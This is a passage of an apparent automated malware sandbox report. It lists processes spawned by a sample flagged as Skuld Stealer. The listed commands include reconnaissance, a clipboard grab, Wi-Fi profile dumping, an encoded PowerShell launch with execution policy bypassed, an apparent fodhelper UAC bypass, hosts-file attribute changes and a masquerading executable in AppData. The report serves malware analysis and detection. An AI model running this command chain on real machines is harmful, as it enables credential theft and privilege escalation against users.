MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:05:21:27
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:05:21:27
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
Imagebase:0x7ff738e20000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:05:21:27
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
Imagebase:0x7ff738e20000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true
                                                                                                                                                                                                                                Target ID:41
                                                                                                                                                                                                                                Start time:05:21:27
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [base64-encoded command blob removed]"
Imagebase:0x7ff738e20000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:05:21:28
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:05:21:28
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:44
Start time:05:21:28
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:05:21:28
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:46
Start time:05:21:28
Start date:17/11/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell Get-Clipboard
Imagebase:0x7ff6cb6b0000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:47
Start time:05:21:28
Start date:17/11/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff70e8b0000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:48
Start time:05:21:28
Start date:17/11/2024
Path:C:\Windows\System32\systeminfo.exe
Wow64 process (32bit):false
Commandline:systeminfo
Imagebase:0x7ff708870000
File size:110'080 bytes
MD5 hash:EE309A9C61511E907D87B10EF226FDCD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:49
Start time:05:21:28
Start date:17/11/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff7cb010000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:50
Start time:05:21:28
Start date:17/11/2024
Path:C:\Windows\System32\reg.exe
Wow64 process (32bit):false
Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Imagebase:0x7ff6156b0000
File size:77'312 bytes
MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:51
Start time:05:21:28
Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
                                                                                                                                                                                                                                Imagebase:0x7ff6cb6b0000
                                                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:52
                                                                                                                                                                                                                                Start time:05:21:28
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:netsh wlan show profile
                                                                                                                                                                                                                                Imagebase:0x7ff792750000
                                                                                                                                                                                                                                File size:96'768 bytes
                                                                                                                                                                                                                                MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:54
                                                                                                                                                                                                                                Start time:05:21:30
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
                                                                                                                                                                                                                                Imagebase:0xbe0000
                                                                                                                                                                                                                                File size:10'375'680 bytes
                                                                                                                                                                                                                                MD5 hash:DBBD2127D1030E4C9548FDF7DE9983A7
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000036.00000002.1700904810.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000036.00000000.1632827829.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000036.00000000.1632827829.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Author: Joe Security
                                                                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                                                                • Detection: 63%, ReversingLabs
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:55
                                                                                                                                                                                                                                Start time:05:21:30
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:56
                                                                                                                                                                                                                                Start time:05:21:31
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:cmd.exe /C fodhelper
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:57
                                                                                                                                                                                                                                Start time:05:21:31
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\fodhelper.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:fodhelper
                                                                                                                                                                                                                                Imagebase:0x7ff6cc440000
                                                                                                                                                                                                                                File size:49'664 bytes
                                                                                                                                                                                                                                MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:58
                                                                                                                                                                                                                                Start time:05:21:32
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\fodhelper.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Windows\system32\fodhelper.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6cc440000
                                                                                                                                                                                                                                File size:49'664 bytes
                                                                                                                                                                                                                                MD5 hash:85018BE1FD913656BC9FF541F017EACD
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:59
                                                                                                                                                                                                                                Start time:05:21:32
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\consent.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:consent.exe 6092 324 0000019985E22B80
                                                                                                                                                                                                                                Imagebase:0x7ff7bdcd0000
                                                                                                                                                                                                                                File size:186'704 bytes
                                                                                                                                                                                                                                MD5 hash:DD5032EF160209E470E2612A8A3D5F59
                                                                                                                                                                                                                                Has elevated privileges:true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 60
Start time: 05:21:33
Start date: 17/11/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
Imagebase: 0x7ff67e6d0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 61
Start time: 05:21:33
Start date: 17/11/2024
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.cmdline"
Imagebase: 0x7ff714350000
File size: 2'759'232 bytes
MD5 hash: F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 62
Start time: 05:21:33
Start date: 17/11/2024
Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2A5B.tmp" "c:\Users\user\AppData\Local\Temp\3pyiazzo\CSC68A32BD75EFB4A1F8C11C6C63FDD8E5.TMP"
Imagebase: 0x7ff7addb0000
File size: 52'744 bytes
MD5 hash: C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 63
Start time: 05:21:34
Start date: 17/11/2024
Path: C:\Windows\System32\fodhelper.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\fodhelper.exe"
Imagebase: 0x7ff6cc440000
File size: 49'664 bytes
MD5 hash: 85018BE1FD913656BC9FF541F017EACD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 65
Start time: 05:21:34
Start date: 17/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase: 0x7ff738e20000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 66
Start time: 05:21:34
Start date: 17/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "getmac"
Imagebase: 0x7ff738e20000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 67
Start time: 05:21:34
Start date: 17/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
Imagebase: 0x7ff738e20000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 68
Start time: 05:21:34
Start date: 17/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 69
Start time: 05:21:34
Start date: 17/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 70
Start time: 05:21:34
Start date: 17/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 71
Start time: 05:21:34
Start date: 17/11/2024
Path: C:\Windows\System32\getmac.exe
Wow64 process (32bit): false
Commandline: getmac
Imagebase: 0x7ff6ba8f0000
File size: 90'112 bytes
MD5 hash: 7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:72
                                                                                                                                                                                                                                Start time:05:21:34
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tree /A /F
                                                                                                                                                                                                                                Imagebase:0x7ff70e8b0000
                                                                                                                                                                                                                                File size:20'992 bytes
                                                                                                                                                                                                                                MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:73
                                                                                                                                                                                                                                Start time:05:21:35
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                Imagebase:0x7ff7cb090000
                                                                                                                                                                                                                                File size:23'040 bytes
                                                                                                                                                                                                                                MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:74
                                                                                                                                                                                                                                Start time:05:21:35
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
                                                                                                                                                                                                                                Imagebase:0xbe0000
                                                                                                                                                                                                                                File size:10'375'680 bytes
                                                                                                                                                                                                                                MD5 hash:DBBD2127D1030E4C9548FDF7DE9983A7
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 0000004A.00000000.1680272657.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000004A.00000002.1701196379.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 0000004A.00000002.1701196379.00000000010B5000.00000002.00000001.01000000.0000001E.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:75
                                                                                                                                                                                                                                Start time:05:21:35
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:76
                                                                                                                                                                                                                                Start time:05:21:35
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                Imagebase:0x7ff738e20000
                                                                                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:77
                                                                                                                                                                                                                                Start time:05:21:35
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:78
                                                                                                                                                                                                                                Start time:05:21:35
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:79
                                                                                                                                                                                                                                Start time:05:21:35
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:80
Start time:05:21:36
Start date:17/11/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff70e8b0000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:81
Start time:05:21:36
Start date:17/11/2024
Path:C:\Windows\System32\attrib.exe
Wow64 process (32bit):false
Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
Imagebase:0x7ff7cb090000
File size:23'040 bytes
MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:82
Start time:05:21:36
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff738e20000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:83
Start time:05:21:36
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:84
Start time:05:21:36
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:0x7ff738e20000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:85
Start time:05:21:36
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:86
Start time:05:21:36
Start date:17/11/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff70e8b0000
File size:20'992 bytes
MD5 hash:9EB969EF56718A6243BF60350CD065F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:87
Start time:05:21:36
Start date:17/11/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff7cb010000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:88
Start time:05:21:38
Start date:17/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff738e20000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:89
Start time:05:21:38
Start date:17/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6ee680000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:90
Start time:05:21:38
Start date:17/11/2024
Path:C:\Windows\System32\tree.com
Wow64 process (32bit):false
Commandline:tree /A /F
Imagebase:0x7ff70e8b0000
File size:20'992 bytes
                                                                                                                                                                                                                                MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:91
                                                                                                                                                                                                                                Start time:05:21:39
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\XClient.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\XClient.exe"
                                                                                                                                                                                                                                Imagebase:0xa10000
                                                                                                                                                                                                                                File size:71'168 bytes
                                                                                                                                                                                                                                MD5 hash:7439CC991A9A756C41153B8E9121BAAB
                                                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Target ID:92
                                                                                                                                                                                                                                Start time:05:21:40
                                                                                                                                                                                                                                Start date:17/11/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
